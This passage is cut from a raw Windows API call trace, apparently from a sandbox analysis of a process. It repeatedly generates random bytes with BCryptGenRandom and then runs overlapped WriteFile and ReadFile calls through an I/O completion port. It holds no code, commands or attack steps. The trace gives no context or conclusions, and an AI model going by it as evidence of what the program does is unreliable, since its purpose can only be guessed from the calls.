dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.919] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.930] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.931] CloseHandle (hObject=0x3cc) returned 1 [0204.931] free (_Block=0x3df0008) [0204.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.954] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.954] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.954] free (_Block=0x3e305b8) [0204.954] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.954] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.954] free (_Block=0x1fa91d0) [0204.954] free (_Block=0x1fa2ed8) [0204.954] free (_Block=0x1fa90b8) [0204.954] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.955] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.966] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.966] CloseHandle (hObject=0x3cc) returned 1 [0204.966] free (_Block=0x3df0008) [0204.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.976] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.976] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.976] free (_Block=0x3e305b8) [0204.976] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.976] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.976] free (_Block=0x1fa91d0) [0204.976] free (_Block=0x1fa2ed8) [0204.976] free (_Block=0x1fa90b8) [0204.976] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.977] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.987] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.988] CloseHandle (hObject=0x3cc) returned 1 [0204.988] free (_Block=0x3df0008) [0204.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.998] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.998] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.998] free (_Block=0x3e305b8) [0204.998] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.998] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.998] free (_Block=0x1fa91d0) [0204.999] free (_Block=0x1fa2ed8) [0204.999] free (_Block=0x1fa90b8) [0204.999] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.999] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.010] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.011] CloseHandle (hObject=0x3cc) returned 1 [0205.011] free (_Block=0x3df0008) [0205.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.019] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.020] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.020] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.020] free (_Block=0x3e305b8) [0205.020] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.020] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.020] free (_Block=0x1fa91d0) [0205.020] free (_Block=0x1fa2ed8) [0205.020] free (_Block=0x1fa90b8) [0205.020] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.021] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.035] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.036] CloseHandle (hObject=0x3cc) returned 1 [0205.036] free (_Block=0x3df0008) [0205.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.045] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.045] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.045] free (_Block=0x3e305b8) [0205.045] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.045] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.045] free (_Block=0x1fa91d0) [0205.046] free (_Block=0x1fa2ed8) [0205.046] free (_Block=0x1fa90b8) [0205.046] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.046] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.057] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.057] CloseHandle (hObject=0x3cc) returned 1 [0205.057] free (_Block=0x3df0008) [0205.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.495] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.495] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.495] free (_Block=0x3e305b8) [0205.495] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.495] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.495] free (_Block=0x1fa91d0) [0205.495] free (_Block=0x1fa2ed8) [0205.495] free (_Block=0x1fa90b8) [0205.495] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.496] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.505] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.506] CloseHandle (hObject=0x3cc) returned 1 [0205.506] free (_Block=0x3df0008) [0205.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.513] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.513] free (_Block=0x3e305b8) [0205.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.513] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.513] free (_Block=0x1fa91d0) [0205.513] free (_Block=0x1fa2ed8) [0205.513] free (_Block=0x1fa90b8) [0205.513] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.514] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.665] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.665] CloseHandle (hObject=0x3cc) returned 1 [0205.665] free (_Block=0x3df0008) [0205.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.669] CloseHandle (hObject=0x3cc) returned 1 [0205.669] free (_Block=0x3df0008) [0205.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.676] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.677] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.677] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.677] free (_Block=0x3e305b8) [0205.677] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.677] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.677] free (_Block=0x1fa91d0) [0205.677] free (_Block=0x1fa2ed8) [0205.677] free (_Block=0x1fa90b8) [0205.677] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.687] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.687] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.687] free (_Block=0x3e305b8) [0205.687] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.687] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.688] free (_Block=0x1fa91d0) [0205.688] free (_Block=0x1fa2ed8) [0205.688] free (_Block=0x1fa90b8) [0205.688] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, 